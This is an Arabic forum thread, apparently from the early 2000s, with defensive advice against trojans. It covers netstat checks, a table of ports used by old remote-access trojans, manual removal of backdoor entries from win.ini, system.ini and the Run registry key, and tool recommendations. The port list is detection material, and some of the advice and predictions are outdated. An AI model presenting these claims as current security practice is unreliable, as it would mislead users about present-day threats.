لانه يكثر فيها ارسال الفيروسات و نشرها .

LockDown
قد اكون ذكرته من قبل , بس ما ذكرته مره ثانيه الا للاهميه لانه يدعي انه يحمي جهازك من الهاكر بينما يقوم بإنزال فيروسين في جهازك يستطيع اي شخص الدخول في جهازك

الف الف الف شكر

شكرا يا مان

شكرا شكرا

ممتاااااااااااااااز :icon30: :icon30:

الف شكر............................

شكرا اخي العزيز على النصائح

مشكووووووووووووووووووووووووووووووووووووووووووووووو ووووووووووووووووووووووووووووووور

شكررررررررررررررررررررا يا مان

قبل الحديث عن حماية جهازك ، يجب أن نتذكر بعض النقاط المهمة التى بدونها لا فائدة من الحماية:

وجود برنامج حماية من قراصنة الكمبيوتر بجهازك، لا يعني عدم قدرتهم على اختراقه· إذا اعتقدت أن وجود عدة برامج حماية بجهازك ، وتعمل فى آن واحد سوف يحمى جهازك و يزيد من فعالية الحماية فأنت مخطىء تماما، لأن ذلك يضعف من إمكانية الحماية على الجهاز·

وإذا لم تكن مباليا بهؤلاء القراصنة معتقدا أنه ليس في جهازك شئ تخاف عليه، فأنت لم تفهم هدف القراصنة·

ان هدف 80 في المئة من القراصنة هو الحصول على اشتراكك و رقمك السري وبريدك الإلكتروني ورقمه السري ، لأهداف كثيرة وخطيرة جدا، منها الابتزاز والتخريب الذى يتم بسهولة لو تم اختراق جهازك·

أما الـ20 في المئة الباقون، فهدفهم الرئيسى هو التجسس والإطلاع على محتويات جهازك ومعلوماتك الشخصية وصورك الخاصة، وسحب ملفات أو برامج، أو مسحها كلياً من جهازك وهذه الفئة تندرج تحت مسمى الهواة أو الذين يستعرضون عضلاتهم على خلق الله ·

طرق الحماية

إذا كنت تريد الحماية، اتبع الطرق الآتية :

أولاً : يجب التأكد من عدم وجود تروجان بجهازك، والتروجان هو خادم يسمح للمخترق بالتحكم الكامل فى جهازك، ويتم زرعه بجهازك عن طريق المخترق و ذلك بإرساله إليك عن طريق بريدك الإلكتروني مثلا أو عن طريق برامج الدردشة الفورية مثل ICQ أو عن طريق قرص مرن، أو تقوم أنت بزرعه فى جهازك عن طريق الخطأ بسبب عبثك فى برامج الاختراق · فتقوم بفك التروجان في جهازك، بدلا من أن ترسله إلى الجهاز المراد اختراقه ، لذلك أنصحك عدم تحميل هذه البرامج نهائياً ، ولكي نتأكد ما اذا كان بجهازك تروجان أم لا، هناك عدة طرق مثل البحث فى ملف السجل Registry ريجستري الخاص بالوندورز، ولأهمية الريجستيري ولتفادى حذفك الملفات عن طريق الخطأ سوف نبحث عن التروجان بطريقة آمنة و ذلك باستخدام برامج باحثة · الذي يعد أفضل برنامج Cleaner Theفإذا لم يكن متوفرا لديك، قم بتحميله فوراً وهو برنامج http://www.moo soft.com/download.php

ثانياً : قم بعمل بحث عن التروجان بالضغط على زر بحث سكان Scan و بعد الانتهاء من البحث على قرصك الصلب، سيخبرك برنامج إن كان يوجد لديك تروجان مزروع بجهازك، وسيعطيك خيار حذفه أو عدمه ، طبعاً إضغط على الموافقة لحذفه · إذا إنتهى البحث و ظهرت نافذة صغيرة مكتوب بها scan complete فهذا معناه أن جهازك خال و نظيف من التروجان ·

ثالثاً : قم بتحديث البرنامج المكافح للفيروسات لديك دائماً ، فبرنامج الفيروسات يقوم أحياناً بكشف التروجان عند فتحه عن طريق تحديث البرنامج الموجود على جهازك لأن عمل UPDATE باستمرار من على الإنترنت · فيكون قد تم وضع آخر إصدار لهذه البرامج المكافحة للفيروس والتروجان من على الموقع الخاص ببرنامج المكافحة ومدك أيضاً بأحداث أسماء للفيروسات والتروجان الذى أنصحك دائماً بعمل UPDATE للبرنامج الخاص بك باستمرار · وأيضاً معرفة أحدث البرنامج المكافحة للفيروسات والتروجان من خلال شبكة الإنترنت ·

رابعاً : استقبل الملفات أو البرامج أو الصور من أشخاص تثق بهم فقط ، وإن لم تفعل ذلك، فعلى الأقل لا تقم بفتحها إلا بعد انقطاعك عن الاتصال ، وبعد فتحها جميعاً قم بعملية بحث عن التروجان بواسطة برنامج Cleaner على قرصك الصلب لتتأكد من خلوه من التروجان ، فالتروجان له خاصية الذوبان فى النظام ، علماً بأن حجمه يتراوح من 50 إلى 150 كيلو بايت حسب نوعيته و إصداره · (قد تستقبل صورة أو ملف و يكون التروجان مزروعا بداخلها لذلك احذر)

خامساً : إاذر الملفات التى تأتيك عن طريق البريد الإلكتروني، فإذا كان الملف المرسل إليك من شخص لا تثق به و من نوع dll أو exe فلا تستقبله أبداً أبداً أبداً أبداً أبداً ·

سادساً و أخيراً : يفضل أن يكون رقمك السري مكونا من حروف وأرقام، ويكون أكثر من 8 خانات ، كما يفضل تغييره على الأقل كل شهر · أنت الآن فى أمان من الهاكرز إن شاء الله
:flex0000:

البورت هي البوابة التي تمكن الهاكر من الدخول إلى جهازك، لذلك يجب عليك أن تعرف هذه البوابة وتقوم بإغلاقها. وسنذكر الطريقة التي تكشف لك البوابات ( البورتات ) المفتوحة في جهازك.



تتم هذه الطريقة باستعمال الدوس.. قم بتشغيل الدوس بعدها أدخل الأمر التالي:




Netstat -a



ثم اضغط enter


عند تنفيذ الخطوات السابقة سيتم عرض جميع المنافذ المفتوحة وهي التي تلي الرمز ( : ) أما ما قبل الرمز فهو اسم الكمبيوتر الخاص بك الذي تم تعريفه عند تجهيز شبكة الاتصال.
http://www.websy.net/learn/hackers/dos.gif

ملاحظة

:
إذا أردت أن تحصل على نتائج حقيقية يجب أن تكون متصلاً بالإنترنت.


--------------------------------------------------------------------------------

قائمة بأرقام المنافذ (البورتات) التي تستخدمها برامج الإختراق المتعددة.




رقم المنفذ ( Port )

اسم البرنامج



2

Death


21
Net Administrator, Senna Spy FTP Server,


23
Truva Atl


25
NewApt


48
DRAT


50
DRAT


80
Hooker


123
Net Controller


146
Infector


146 (UDP)
Infector


605
Secret Service


777
Aim Spy


1000
Der Spacher 3


1001
Der Spacher 3


1020
Vampire


1050
MiniCommand


1080
WinHole


1095
RAT


1097
RAT


1098
RAT


1099
RAT


1200 (UDP)
NoBackO


1201 (UDP)
NoBackO


1207
SoftWAR


1313
NETrojan


1969
OpC BO


2000
Der Spaeher 3


2001
Der Spaeher 3


2300
Xplorer


2716
The Prayer


2773
SubSeven


3456
Terror Trojan


4242
Virtual Hacking Machine


5031
NetMetropolitan


5637
PC Crasher


5638
PC Crasher


6272
Secret Service


6667
ScheduleAgent


6669
Host Control


6711
SubSeven


6712
SubSeven


6713
SubSeven


6776
2000 Cracks


7000
SubSeven


7215
SubSeven


8787
Back Orifice 2000


8897
HackOffice


8989
Rcon


9999
The Prayer


10086
Syphillis


10666 (UDP)
Ambush


11050
Host Control


11223
Secret Agent


12349
BioNet


12623 (UDP)
DUN Control


16484
Mosucker


16772
ICQ Revenge


17777
Nephron


19864
ICQ Revenge


20203
Chupacabra


20331
Bla


27374
SubSeven


27573
SubSeven


32418
Acid Battery


34555 (UDP)
Trinoo


35555 (UDP)
Trinoo


37651
YAT


52317
Acid Battery 2000


54283
SubSeven


57341
NetRaider


61348
Bunker_Hill


61603
Bunker_Hill


63485
Bunker_Hill


65432
The Traitor


65432 (UDP)
The Traitor

أخطر برامج الإختراق يسمى في منطقة الخليج ( الباكدور جي ) ويطلق عليه البعض إسم القنبلة تتركز خطورته في أنه يتميز بمخادعة الشخص الذي يحاول إزالته فهو يعيد تركيب نفسه تلقائيا بعد حذفه يعتبر أقوى برنامج إختراق للأجهزة الشخصية وفي إصدارته الأخيرة يمكنه أن يخترق سيرفر لقنوات المحادثة Mirc كما يمكنه إخترق أي جهاز أي شخص بمجرد معرفة إسمه في ICQ






أخطر برامج الإختراق يسمى في منطقة الخليج ( الباكدور جي ) ويطلق عليه البعض إسم القنبلة تتركز خطورته في أنه يتميز بمخادعة الشخص الذي يحاول إزالته فهو يعيد تركيب نفسه تلقائيا بعد حذفهيعتبر أقوى برنامج إختراق للأجهزة الشخصية .. وفي إصدارته الأخيرة يمكنه أن يخترق سيرفر لقنوات المحادثة Mirc كما يمكنه إخترق أي جهاز أي شخص بمجرد معرفة إسمه في ICQ كما يمكنه إختراقمزودات البريد smtp/pop3 يعتبر الإختراق به صعب نسبيا وذلك لعدم إنتشار ملف التجسس الخاص به في أجهزة المستخدمين الا أنه قائما حاليا على الإنتشار بصورة مذهلة ويتوقع أنه بحلول منتصف عام 2001 سوف تكون نسبة الأجهزة المصابة بملف السيرفر الخاص به 40-55 % من مستخدمي الإنترنت حول العالم وهذه نسبة مخيفة جدا إذا تحققت فعلا ... مميزاته خطيرة للغاية فهو يمكن المخترق من السيطرة الكاملة على الجهاز وكأنه جالس على الجهاز الخاص به حيث يحتوي على أوامر كثيرة تمكنه من السيطرة عليه ... بل يستطيع أحيانا الحصول على أشياء لا يستطيع مستخدم الجهاز نفسه الحصول عليها مثل كلمات المرور .. فالمخترق من هذا البرنامج يستطيع الحصول على جميع كلمات المرور التي يستخدمها صاحب الجهاز !!! ولخطورته الكبيرة فسوف نفصل في الشرح عنه

http://www.websy.net/learn/hackers/sub7.gif


أعـراض الإصابة :



من أهم أعراض الإصابة بهذا البرنامج ظهور رسالة " قام هذا البرنامج بأداء عملية غير شرعية ... " وتظهر هذه الرسالة عند ترك الكمبيوتر بدون تحريك الماوس أو النقر على لىحة المفاتيح حيث يقوم البرنامج بعمل تغييرات في حافظة الشاشة وتظهر هذه الرسائل عادة عندما تقوم بإزالة إدخالات البرنامج في ملف system.ini كما أن بإمكان الخادم إعادة إنشاء نفسه بعد حذفه من الويندوز بإستخدام بعض الملفات المساعدة له في ذلك



خطورة البرنامج :



يمكن عمل تعديلات على الخادم الخاص بالبرنامج من خلال برنامج التحرير الخاص به لذلك فإنه من الواجب البحث في أي مكان ممكن أن يسجل فيه ليعمل تلقائيا يعني أي مكان يمكن وضع أوامر للويندوز ليقوم بتشغيله تلقائيا .



التخلص منه :



1- إفتح الملف win.ini الموجود في مجلد الويندوز وابحث في بداية السطور الأولى من هذاالملف عن أي قيك شبيهة بالقيم التـالية :



run=xxxx.exe أو run = xxxx.dll أو Load=xxxx.exe أو Load = xxxx.dll



لاحظ أن xxxx تعني إسم الخادم وإذا عثرت على أي قيمة منها فقم بحذفها



2- افتح الملف system.ini الموجود في مجلد الويندوز وفي السطر الخامس ستجد السطر التالي :



shell = Explorer.exe ... فإذا كان جهازك مصابا ستجد السطر على هذا الشكل :



shell=Explorer.exe xxxx.exe .... أو shell = Explorer.exe xxxx.dll



مع العلم بأن xxxx هو إسم الخادم الذي من أشهر أسمائه rundll16.exe و Task_Bar.exe فإذا كان كذلك فقم بمسح إسم الخادم فقط ليصبح السطر : shell = Explorer.exe



3- إضغط على start ثم تشغيل ثم إكتب regedit لتدخل الى



ملف السجل ثم قم بالدخول تسلسليا على الأتي :



HKEY_LOCAL_MACHINE



Software



Microsoft



Windows



Current Version



داخل المجلد Run إبحث عن إسم الخادم الذي عثرت عليه في مــلف system.ini أو الملف win.ini ( في بعض الأحيان قد يتغير إسم الخادم في ملف التسجيل لذلك إبحث عن أي شي غريب ) ثم بعد ذلك توجه لمجلد الويندوز وستجد أن حجم الخادم الذي عثرت عليه في ملف التسجيل حوالي 328 كيلو بايت إذا كان كذلك عد لنفس المنطقة في ملف التسجيل وقم بحذف القيمة وذلك بالنقر على إسمها وإختيار حذف delete الآن أعد تشغيل الجهاز ثم توجه لمجلد الويندوز وقم بحذف الخادم بالنقر عليه بالزر الأيمن للماوس وإختيار حذف

سنحاول اليوم استعراض بعض البرامج التي توفر الحماية أينما كنت على شبكة الإنترنت، وكذلك بعض البرامج التي تقفل جهازك وتقوم بتشفير البيانات التي تبعث بها بحيث لا يعترضها أحد أو لا تقع في يد حتى أقرب الموظفين إليك في مجال العمل· وسواء أردنا ذلك أو لم نرده، فان الإبحار على شبكة الإنترنت يجعلنا عرضة للقراصنة والمخترقين، والمتطفلين، وغيرهم·

* إلغاء الإعلانات

صحيح أن الإعلانات التي تقفز أمامك على الشاشة كلما تنقلت من صفحة الى أخرى ليست مضرة وهي في بعض الأحيان الثمن الذي تدفعه مقابل الاستفادة من المواقع التي تتصفحها، ولكنك تستطيع أن تزيل الإعلانات من كمبيوترك إذا استخدمت البرنامج التالي المجاني OptOut الذي تستدعيه من موقع الشركة http://grc.com على الإنترنت، وبالذات من الصفحة http://grc.com/optout.htm فهذا البرنامج يزيل حتى بقايا الاعلانات التي تعلق في الكمبيوتر·

وهناك برنامج آخر أقوى منه هو ad-Aware وهو برنامج مجاني تستطيع استدعاءه من موقع الشركة www.lavasoft.de



الوقاية من القراصنة

ربما كانت الطريقة المثلى للوقاية من المخترقين والقراصنة على الإنترنت وخصوصا إذا كان أحدنا يستخدم الخط الرقمي أو ADSL السريع، في استخدام جدران النار الشخصية·

ويعد البرنامج Tiny Personal Firewall من البرامج الناجحة في هذا الخصوص، وتستطيع استدعاءه من موقع الشركة Tiny Software على العنوان www.tinysoftware.com/index.php فهو يوفر ثلاثة مستويات من الوقاية ويجعلك توصف الأمان حسبما تريد وهناك أيضا البرنامج Termi-Net وتجده على العنوان www.danu.ie وهو جدار ناري وتستطيع ان توصف مستويات الأمن المناسبة لك والتي تعمل بطريقة تلقائية·

من جهة أخرى، فانك تحتاج في كل مرة تريد مراجعة بريدك الالكتروني الى كلمة مرور Password وبدونه لا تستطيع أن تحصل على رسائلك الالكترونية، وكذلك الحال كلما أردت شراء بعض السلع والخدمات عبر الانترنت·

ان ذلك يعرضك لمخاطر القراصنة الذين قد يسرقون رقم بطاقة الائتمان الشخصية الخاصة بك لاستخدامها، ولهذا السبب، تستطيع بقليل من العناية أن تحافظ على السرية والأمان في هذه الأحوال كلها·

إليك بالبرنامج Password 0002 وتجده على عنوان الشركة www.mightsoft.com فهو يقوم باختزان وحفظ كلمات المرور الخاصة بك كما يقوم بتشفيرها بحيث لا يستطيع أحد فهمها، كما يمكن للبرنامج أن يعد كلمات مرور خاصة بك·



الوقاية من الكعكات Cookies

الكعكات Cookies كما نعرف جميعا عبارة عن ملفات لبرامج صغيرة للغاية ترسلها الى كمبيوترك شركات ما أثناء زيارتك لمواقعها على الانترنت، ومن المعروف أن هذه الكعكات تلتصق بالكمبيوتر وتبدأ بارسال معلومات الى الشركات المعنية تبين فيها طريقتك في الابحار على الانترنت، واسلوبك في التعامل مع المواقع، وتهدف من وراء ذلك الى تطوير خدماتها بحيث تلبي رغباتك ورغبات الآخرين، ولكن كثيرا من المبحرين لا يحبذون ذلك وخصوصا ان بعض أنواع الكعكات تتابع كل صفحة من صفحات الوب التي تزورها·

وهناك برنامج تستطيع بواسطته التخلص من الكعكات وهو Zeroclick وتستطيع استدعاءه مجانا من عنوان الشركة www.davecentral.com/86321.html وهو يمنع أي نوع من الكعكات من الالتصاق بجهازك·

وهناك برامج تخيرك بين قبول هذه الكعكات أو رفضها منها البرنامج Cookie Pal وتجده على عنوان الشركة www.kburra.com أو البرنامج (شرطي الكعكات) Cookie Cop وتجده على عنوان الشركة www.pacificnet.net/~bbruce/cookycop.htm



كيف تقفل جهازك؟

الحفاظ على السرية لا يقتصر فحسب على ابحارك على شبكة الانترنت، بل يشمل أيضا أولئك الأشخاص الذين يستخدمون جهازك في غيابك، ولذلك تحتاج الى برنامج يقفله ويقوم بتشفير كافة البيانات الموجودة فيه·

ان البرنامج Freezer خير من يقوم بالمهمة وتجده على عنوان الشركة www.talyasoft.com وهو يستخدم مستويات مختلفة من التعقيد لمنع أي شخص من دخول جهازك أو حتى استخدام أي وظيفة منه، كما يمنعه من استخدام كلمة المرور الخاصة بك· البرنامج ثمنه 25 دولارا ولكنك تستطيع تجربته لمدة شهر. وهناك أيضا البرنامج SecureIt Pro وتجده على عنوان الشركة www.go.to/quantrix

أما اذا لم ترد اغلاق جهازك وتريد أن تعرف كيف يستخدمه الآخرون في غيابك، اليك هذا البرنامج Desktop Dectective وتجده على عنوان الشركة www.davecentral.com/84321.html

) تشـفـيــر رسائل البريد الإلكتروني Encryption

التشفير وسيلة لأستبدال رسالة او أي مستند حيث لايمكن معرفة محتوياتها وذلك بالترميز وهو عملية تحويل النص المبسط او المستند الواضح الي رموز ، وترميز المحتويات هو نظام اظهار البيانات بواسطة سلسة محددة سابقا من الحروف والأرقام والرموز والكلمات والإشارات والهدف هو منع فهم واستخدام البيانات من قبل الأشخاص الذين لايملكون وسائل فك الترميز ، وفقط الأشخاص المزودين بوسائل تشفير الملف يمكنهم الإطلاع عليه.

كيفية تشفير البيانات

بشكل عملي التشفير هو عملية استبدال للقيم والعناصر المحددة في رسالة او اية بيانات اخرى وتتم هذة العملية على مستوى الحروف فمثلا يستبدل حرف r بالحرف m والرقم 9 بالرقم 3 والأمثلة السابقة تنطبق على الملفات النصية والبيانات الثنائية 8bit حيث يتم ترميزها بأستخدام مزيج من الحروف والأرقام .

إن ارسال البيانات المألوفة بواسطة المودم وخطوط الهاتف لاتتعامل مع حروف الـ 8bit كبيانات فالبيانات المنقوله عبر المودم تكون بتنسيق 7bit لأن معظم حروف 8bit التي تظهر في ملف ثنائي تستخدم كحروف واشارات تحكم من قبل المنافذ التسلسلية والمودم والبرامج المتعلقة بارسال البيانات. لذلك عند تحويل ملف ثنائي ليتم التعامل معه كملف 7bit او كملف ASCII تستبدل حروف 8bit بالحروف 7bit حيث تستند نماذج الأستبدال على التنسيق MIME, UUENCODE لذلك لاتوجد مشكلة في فك الترميز عند استلام البيانات المرسلة.

وكمثال على ذلك فأننا كثيرا ما نستلم رسائل بريدية من مصدر مجهول وعند محاولة قرائتها نجد بأن هناك حروفا وطلاسم لايمكن لنا ان نقراها ويعود ذلك في اغلب الأحيان أي أن تلك الرسالة قد ارسلت الينا عن طريق الخطأ وهي مشفرة .

كيفية فك التشفير

ان عملية فك التشفير Decryption,Uncryption هي اعادة اظهار البيانات من رسالة مشفرة مستندة على رمز وشيفرة معروفة حيث يتم فك التشفير باستخدام قائمة او جدول او مفتاح بشكل نظري حيث لايمكن قراءة البيانات المشفرة بدون المفتاح الذي يستخدم كدليل او مرجع لكل الإستبدالات التي قمنا بها عند فك التشفير.

إن عمليتي التشفير Encryption وفك التشفير Decryption هما في سهولة قراءة هذة الإسطر ولاتستند على برمجية معقدة وكل ما هو مطلوب من المستخدم كتابة رسالته البريدية وارفاق المفتاح العام بها حيث تعتمد عملية التشفير الحديثة هذة على المفتاح العام الذي سيتقبله الطرف الأخر وهو عبارة عن رمز يخدم كدليل للتشفير الذي قام به الراسل من خلال المفتاح الخاص الذي استخدمه لتشفير الرسالة . بصيغة اخرى فأن المستقبل او المرسل اليه هو المخول الوحيد لقراءة الرسالة المشفرة لأنه القادر على فك تشفيرها من خلال المفتاح العام المرفق بها وعبر فتحها بالمفتاح الخاص الذي يكون ضمن برنامج التشفير المحمل بجهازه.

يمكن الحصول على نسخة من برنامج تشفير رسائل البريد الإلكتروني الشهير باسسم Pretty Good Privacy PGP من موقع Aims.net على الرابطة http://aims.cjb.net وهو تطبيق يجب ان يحمل في كلا الجهازين الخاصين بالمرسل والمرسل اليه حيث يتم تبادل الرسائل البريدية المشفرة وفك تشفيرها عبر المفاتيح الخاصة والعامة والتطبيق في سهولته لايتجاوز صعوبه كتابة وارسال رسائل البريد الإلكتروني ذاتها ويمكن ارسالها مشفرة او خالية من التشفير.

2) التخلص من الملفات المحذوفة

إذا كنت لاتستخدم الكمبيوتر كثيرا ولاتقوم بأنشاء وحفظ عدد كبير من الملفات فإن بقايا ملفاتك المحذوفة او قطع منها ستبقى في القرص الصلب لمدة طويلة وحتى لو عملت على الكمبيوتر يوميا فسيتم استعادة بعض او اجزاء منها بل وحتى الملفات المحذوفة يمكن ايجادها وعرضها واستعادتها وهي ثغرة امنية بجهازك عليك سدها فورا.

لماذا لاتزول الملفات المحذوفة

ان عملية حذف الملفات من القرص الصلب لاتحذف فعليا وبدلا من ذلك فان بيانات ومعلومات الملف يتم ازالتها من فهرس المسار وتصبح القطاعات المشغولة من قبل ذلك الملف متوفرة للأستخدام كما يراها النظام وبشكل عرضي يتم كتابة بيانات الملفات الجديدة على هذة القطاعات فوق البيانات القديمة التي لايتم ازالتها او مسحها ولذلك فهناك قطاعات تحمل بيانات الملف المحذوف دون وجود معلومات على فهرس المسار لأماكن وجودها وبذلك لاتزول الملفات المحذوفة واظهارها وحتى استرجاعها كملف يمكن كملف يمكن للكمبيوتر والتطبيقات قرراءته وهذا ينطبق على القرص الثلب والمرن وحتى اقراص الـ Zip والسيدي رايتر.

هناك ثلاثة ادوات جيدة تقوم بحذف الملفات من القطاعات حذفا لايمكن باي حال من الأحوال استعادتها بعد ذلك وقد وضعت هذة الأدوات بموقع Aims.net لتنزيلها مباشرة وهي على التوالي :

Norton Utilities 2000

Windows Washer

Remove-It

3) ماهي المجازفة عند مشاركة الملفات

تسمع كثيرا من المستشارين والأصدقاء ان لاتبقى خاصيتي المشاركة في الملفات والمشاركة في الطباعة نشطتين بقائمة الإعدادات في ابداء لأن الكل قد حذرك من استغلال هذة الثغرة في اختراق جهازك عبر الإنترنت ... فكيف يتم ذلك ؟؟

ان الشبكات المحلية او الشبكات المنزلية تحتاج الي التشارك في تبدال التطبيقات والملفات فيما بينها فثلا طقم مايكروسوفت اوفيس يحمل على جهاز كمبيوتر منزلي واحد ثم ترسل الملفات الخاصة بتشغيلة على بقية الأجهزة المشتركة ليعمل كأنه محمل عليها جميعا وكذلك الحال في مشاركة الطباعة فعدة كمبيوترات مرتبطة بشبكة منزلية تتشارك جميعها في طابعة واحدة فقط من هنا توفرت خدمة المشاركة في الملفات والطباعة على انظمة ويندوز المختلفة.

حين يقوم المخترق بعملية المسح الشامل Port Scanning فأنه يبحث عن امرين مهمين بالنسبة له في اجهزة الضحايا ، البوابات المفتوحة Ports و ترميز التشارك في الملفات والطباعة على اجهزة الأخرين ، الأمر الأول يتسغله المخترق في الإستعلام عن حقيقتين مهمتين بالنسبة له ، وجود بوابة مفتوحة ، ووجود برنامج خادم Server تجسسي من فئة احصنة طروادة على جهاز الضحية . اما الأامر الثاني فأنه يفيده في الحصول على كلمة او كلمات السر الخاصة بالضحية ... كيف ؟؟؟

حينما ننشط خاصيتي التشارك في الملفات والطباعة نفتح بذلك طريق جديد بيننا وبين الأجهزة الأخرى المشتركة معنا على نفس الشبكة المنزلية او المحلية ، وحينما نتصل بالأنترنت مع الإبقاء على تنشيط هاتين الخاصتين (ودون استخدام تطبيقات تقوم بمراقبتها كما سيتم شرحة لاحقا) فأن الدعوة لكل من يتصلون بالأنترنت توجة للدخول الي اجهزتنا عبر منفذي التشارك إلا أن دخولهم هنا لايسمح لهم بالأختراق المباشر كمايتم عند زراعة ملفات التجسس بالأجهزة ولكنه يسمح لهم بكشف كلمات السر المخزنه في قائمة الـ PWL وهذا النوع لايقل في خطورته عن عملية الإختراق باستخدام زراعة احصنة طروادة لأن كلمات السر الخاصة بمزود خدمة الإنترنت وبحماية الجهاز من التشغيل وبالملفات المشفرة المخزنه على الجهاز تخزن جميعها في قائمة الـ PWL بالويندوز وكشفها من خلال تنشيط التشارك بالملفات والطباعة كسهولة قرائتك لهذة الأسطر الأن .

لسد ثغرة التشارك في الملفات والطباعة مع ابقائهما نشطتين في حالة الشبكات المنزلية استخدم جدارا ناريا مزود بخاصية السد تلك مثل الـ Black Ice Defender او احذف كلمات السر من الـ PWL بواسطة برنامج 007WAPS الذي يمكنك تنزيلة من وموقع Aims.net ودائما تذكر ان لاتختار حفظ كلمة السر الخاصة بالمستخدم وقت الدخول للأنترنت.

4) ثغرة أمنية كبيرة اسمها الملفات المؤقته

إن ويندوز والتطبيقات الأخرى تقوم بحفظ المستندات بشكل متتالي خوفا من احتمال انهيار النظام وبعض التطبيقات تحفظ النصوص المحذوفة والمنقولة والمنسوخة ضمن المستند وهذا النص يحفظ في ملفات القرص حتى لولم تقم بحفظ الملف الذي تعمل عليه ،إن الفكرة تبدو جيدة وعملية ولكن مسألة استغلالها من قبل الأخرين واردة وعلية فأن عملية ايجاد ومسح وحذف الملفات المؤقته بشكل يدوي خير من بقائها متكدسة ومعروضة في الظل ليخرجها المخترق ويتسغلها ضدك. إن المجلد الذي يحفظ هذة الملفات المؤقته يسمى temp وهو موجود في windowstemp ولكن احذر من ان تحذفه كله لأن الويندوز يستند عليه في حفظ الملفات المؤقته كما تم شرحة عاليا. افتح الدليل وابحث فيه عن الملفات التي تهمك فقط وهي عادة تكون بنهايات كالتالي : .doc, .temp,.htm; ونحو ذلك ، حدد الملفات التي ترغب بحذفها فقط ثم احذفها من سلة المهملات .

شكرا على المعلومات وعلى المجهود

الف شكر على ردك

شكرا اخي العزيز على النصائح الغاليه
بس خدها نصيحه مني انا
الهكر بيعتمد على 90% ذكاء
5 % برامج
5% غباء الضحيه

مشكووووووور جدا


كلام صحيح اوافقك الراي اخي الكريم بارك الله فيك علي طرح موضوع كهذا

كل عام وانتم بخير
مانو
جنرال الاغانى الشعبى

موضوع جميــــــل اوى يا باشا اشكرك عليـــــــه

شكرااااااااااااا علي المعلومات القيمه

مشكووووووووووووووووووووووورررررررررررررر

الف شكر على ردكم يا شباب

مشكوور على المعلومات الرائعة

الله ينور فعلا عليك
أنت شكلك كده خبرة فى الهاكرز

شكرا ليك على الموضوع الهايل ده بس ياريت كمان تعرفنا شوية حاجات عن كيفية التهكير عشان نحمى نفسنا ونوقف الناس عن ازيتنا

يتسال الكثير منا كيف يتم اختراق الاجهزه .. وهل يمكن اختراق اى جهاز .. وهل من السهوله اختراق الاجهزه .. ولكى نقم بشرح العمليه لكم يجب توضيح بعض المصطلحات المستخدمه وترجمتها من الانجليزيه الى العربيه

IP = وتعنى البرتكول المستخدم فى الانترنت

IP-No = رقم مقدم الخدمه

Server = الخادم

Client = الزبون او العميل

Patch or Torjan = اسماء مستخدمه لملفات التجسس

Port = البورت او المنفذ


كيف تصاب الاجهزه بملفات التجسس او الفايروس ؟؟

ان اكبر واسرع طرق لانتشار ملفات التجسس او الفايروسات باحد الطرق الثلاثه

اولا .. اما بارسالها مباشره الى جهازك عن طريق برامج المحادثه عندما يقم احدهم بارسال

ملف اليك .. وقد خدع الكثير وللاسف واصيبت اجهزتهم بملفات تجسس او ملفات فايروسات

مدمره عن طريق ارسال صورا اليهم ... فقد يجهل الكثير انه بالامكان وببساطه ادخال ملف

تجسس او فايروس داخل صوره باستخدام برامج كثيره وبدون ان يشعر الشخص المستقبل

للصوره بشى بل العكس سوف يرى الصوره وبشكل طبيعى ولكنه يجهل ان الملف قد تم

ارساله الى جهازه ... ويستطيع ايضا من لهم خبره فى البرمجه على الفيجول بيسك او السى

بلس بلس او غيرها ان يصنع برنامج خاص به يساعده على اضافه اى ملف داخل صور او غيرها


ثانيا ... الارسال بواسطه الاميل فكثير منا ترده رسائل من مصادر لا يعرفها وبها ملفات مرفقه يقم بانزالها

ثالث...... بانزال برامج من مواقع مشبوه


اذا ما هو الحل

الحل بسيط ومريح جدا

اولا ... لا تستقبل اى ملف من اى شخص عند استخدام برامج التشات ..الا من شخص تعرفه معرفه شخصيه

ثانيا .. عند وصول اى اميل من مصدر مجهول .. لاتخاطر بفتحه بل وعلى الفور قم بازالته فلن تخسر شيئا
ثالثا .. لا تقم بانزال اى برنامج من مواقع مجهوله الا ان كانت لديك برامج كاشفه عن الفايروسات وملفات التجسس ... كما اننى انصح بان لا تستخدم الانترنت الا بوجود برنامج مثل ... نورتن انتى فايروس الفين وان تعمل له اب ديت كل اسبوعين ..اى ... اى تجديد للمعلومات ... وهو برنامج لا غنى عنه لانه يتعرف على ملفات التجسس او الفايروسات ويمكنه من معالجتها فى جهازك بدون الاضرار بنظام التشغيل
كيف تتاكد من وجود اى اتصال تام مع جهازك
الامر سهل جدا .. كل ما عليك انه فى حاله التاكد من عدم اتصال اى جهاز اخر مع جهازك .. ان تتجه الى الدوس وتكتب الامر الاتى

C:\Windows\netstat -n

ولاحظ وجود مسافه بعد كلمه نت ستات ثم حرف الان ... ومعناها البحث عن الاتصال بالارقام

عندها سوف تظهر لك شاشه تاخذ ثوانى لاعطائك النتيجه وسوف تكون على النحو الاتى

Proto Local Address Foregin Address Stat

كل ما يهمنا فى الامر الفورن ادرس ووضعه

Foregin Address

والامر

Stat

وتعنى الاتى

Foregin Address = اى العنوان الاجنبى

State = اى الحاله او حاله الاتصال

سوف تجد فى الفورن ادرس ... ارقام مقدم الخدمه لك ..مع رقم البورت او المنفذ .. وهنا يجب ان تنتبه لان الحاله تكون كالاتى

ForeignAddress State

Established 62.135.49.62:8080
اى ان الارقام لمقدم الخدمه هى

62.135.49.62

ثم تاتى بعدها نقطتين فوق بعض ... ياتى بعدها رقم البورت وهو 8080

وهذا وضع طبيعى جدا ... ثم تاتى كلمه ... ستات ... اى الحاله وتحتها كلمه .. اشتبلش .. اى الاتصال تام .. وهذا ايضا طبيعى


المهم فى الامر ان وجدت رقم اى بى غريب ... وتتاكد من ذلك برقم المنفذ .. وهو الذى ياتى بعد النقطتين التى فوق بعض ... مثال

Foreign Adress State

212.100.97.50:12345 Established

انظر الى رقم .. الاى . بى ... ورقم المنفذ .. رقم الاى بى غريب .. ورقم المنفذ هو منفذ لبرنامج تجسس .. وحاله الاتصال تام مع جهازك.. اى انه بالفعل يوجد شخص الان فى داخل جهازك يتجسس عليك ... اكتب رقم المنفذ ... وهو ...البورت ... 12345 .... ثم اتجه الى قائمه البورتات الموجود فى الموقع تحت عنوان ارقام البورتات المستخدمه فى برامج التجسس وابحث عن اسم البرنامج لكى تعرف الملف المصاب به جهازك لتنظيفه


